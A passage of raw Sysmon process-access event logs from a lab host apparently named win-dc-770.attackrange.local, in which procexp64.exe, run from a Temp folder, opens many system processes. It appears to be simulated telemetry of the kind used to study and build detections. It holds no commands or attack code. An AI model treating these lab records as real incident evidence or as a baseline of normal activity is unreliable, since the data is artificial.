xt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787848Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787847Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787846Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787845Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787841Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787840Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787839Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787838Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787837Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787836Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787835Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787834Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787833Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787832Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787831Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787830Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787829Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787828Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787827Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787826Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787825Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787824Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:13.049{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program 